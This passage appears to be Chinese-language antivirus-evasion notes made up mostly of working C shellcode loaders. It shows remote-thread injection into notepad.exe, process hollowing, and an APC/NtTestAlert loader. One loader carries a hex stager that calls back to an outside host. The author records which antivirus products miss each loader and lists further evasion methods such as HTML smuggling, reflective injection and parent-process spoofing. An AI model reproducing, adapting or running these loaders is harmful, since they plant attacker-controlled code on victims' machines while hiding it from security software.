2\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1"; INT FoundPid(const wchar_t* szName) { // 设置变量 PROCESSENTRY32 pe = { 0 }; HANDLE hSnapShot = NULL; int pid = 0; // 初始化大小 pe.dwSize = sizeof(PROCESSENTRY32); // 创建进程快照 hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapShot != INVALID_HANDLE_VALUE) { // 获取快照 BOOL Process = Process32First(hSnapShot, &pe); if (!Process) { return -1; } // 遍历快照 while (Process32Next(hSnapShot, &pe)) { // 判断进程名是否相同 if (!_wcsicmp(szName, pe.szExeFile)) { pid = pe.th32ProcessID; printf("[+] 找到指定进程pid: %d\n", pe.th32ProcessID); break; } } CloseHandle(hSnapShot); return pid; } else { printf("[-] 进程快照创建失败!\t错误值: %d\n", GetLastError()); return -1; } } void InjectShellCode(const wchar_t* szName) { HANDLE Handle, remoteThread; PVOID remoteBuffer; int Pid = FoundPid(szName); Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid); // 还原异或 for (int i = 0; i < sizeof(buf); i++) { buf[i] ^= 50; } remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(buf), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(Handle, remoteBuffer, buf, sizeof(buf), NULL); remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); CloseHandle(Handle); } int main(int argc, char *argv[]) { InjectShellCode(L"notepad.exe"); return 0; }
火绒杀了 360没杀,再异或一个66也是一样,火绒杀了但是360不杀
傀儡进程
这个用c编译
#include <Windows.h> #include <stdio.h> unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1"; BOOL ReplaceProcess(const char *pszFilePath) { STARTUPINFO si = { 0 }; PROCESS_INFORMATION pi = { 0 }; CONTEXT threadContext = { 0 }; BOOL bRet = FALSE; RtlZeroMemory(&si, sizeof(si)); RtlZeroMemory(&pi, sizeof(pi)); RtlZeroMemory(&threadContext, sizeof(threadContext)); si.cb = sizeof(si); // 创建进程并挂起主线程 bRet = CreateProcessA(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); if (FALSE == bRet) { printf("CreateProcess"); return FALSE; } // 在替换的进程中申请一块内存 LPVOID lpDestBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (NULL == lpDestBaseAddr) { printf("VirtualAllocEx"); return FALSE; } // 还原异或 for (int i = 0; i < sizeof(buf); i++) { buf[i] ^= 50; } // 写入替换的数据 bRet = WriteProcessMemory(pi.hProcess, lpDestBaseAddr, buf, sizeof(buf), NULL); if (FALSE == bRet) { printf("WriteProcessError"); return FALSE; } // 获取线程上下文 // 注意此处标志,一定要写!!! threadContext.ContextFlags = CONTEXT_FULL; bRet = GetThreadContext(pi.hThread, &threadContext); if (FALSE == bRet) { printf("GetThreadContext"); return FALSE; } // 修改eip从新申请的内存处运行 threadContext.Rip = (DWORD64)lpDestBaseAddr; // 设置挂起进程的线程上下文 bRet = SetThreadContext(pi.hThread, &threadContext); if (FALSE == bRet) { printf("SetThreadContext"); return FALSE; } // 恢复挂起的进程的线程 ResumeThread(pi.hThread); WaitForSingleObject(pi.hThread, INFINITE); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); return TRUE; } void main() { ReplaceProcess("C:\\Windows\\System32\\notepad.exe"); }
5.未导出api bypass
#include <Windows.h> #include <stdio.h> #pragma comment(lib, "ntdll") using myNtTestAlert = NTSTATUS(NTAPI*)(); int main() { char buf[] = "fce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f052578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe0585f5a8b12eb865d686e6574006877696e6954684c772607ffd5e80000000031ff5757575757683a5679a7ffd5e9a40000005b31c951516a03515168fb20000053506857899fc6ffd550e98c0000005b31d252680032c08452525253525068eb552e3bffd589c683c350688033000089e06a04506a1f566875469e86ffd55f31ff57576aff5356682d06187bffd585c00f84ca01000031ff85f6740489f9eb0968aac5e25dffd589c16845215e31ffd531ff576a0751565068b757e00bffd5bf002f000039c775075850e97bffffff31ffe991010000e9c9010000e86fffffff2f5877424b00c638b6057378a894eecf7bc1aa53ba78900a3bb158655591a5330461ce3d74a0e14842e13a75861c930427a411f354079ef04a095ad081b8e47fe04ded2f08e0fc010136d933a1807300557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e5420362e313b20574f5736343b2054726964656e742f372e303b2072763a31312e3029206c696b65204765636b6f0d0a486f73743a2075732e776f726c646973656e646d61696c2e6d6c0d0a007fef054e2008ae77070f044f1087a24772a18e66fbc21da7ae0deb5058231549208008c5c1d40c32c9f88b3e85652e58a3ca12e34ad665175870d1fc6d165493374260b2c750510707a5328dbaf92eab4f0b92fa87e05815da018b2c9a4a322ff33122f6bb9634cb1790d825298529cb30e5f01f7e6cdfba37bd78b967e41a7ece26d438f78459445dbdd9e7b1c7e0adf81b0c58a4d3ecf83e57191cbeb494683b9b25b3dd9bb903b1421b77de08b283b4e28820e49b04b8b303f85c4d1495900068f0b5a256ffd56a4068001000006800004000576858a453e5ffd593b90000000001d9515389e7576800200000535668129689e2ffd585c074c68b0701c385c075e558c3e889fdffff75732e776f726c646973656e646d61696c2e6d6c00499602d2"; myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert")); unsigned int char_in_hex; unsigned int iterations = strlen(buf); unsigned int memory_allocation = strlen(buf) / 2; //由于字符串编译后默认写入不可写的PE段,所以需要修改内存属性 for (unsigned int i = 0; i < iterations / 2; i++) { //减小开销 sscanf_s(buf + 2 * i, "%2X", &char_in_hex); buf[i] = (char)char_in_hex; } LPVOID shellAddress = VirtualAlloc(NULL, memory_allocation, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, memory_allocation, NULL); PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress; QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);//插入APC到当前线程 testAlert();//APC队列不为空马上运行 return 0; }
这个火绒和360都不杀
6.掩日(进程注入工具)
其他的
简单的:特征去除、加壳、编码加密、分离免杀、图片混淆
比较难的:HTML 挟带、反射注入、dll空心化、进程空心化、父进程欺骗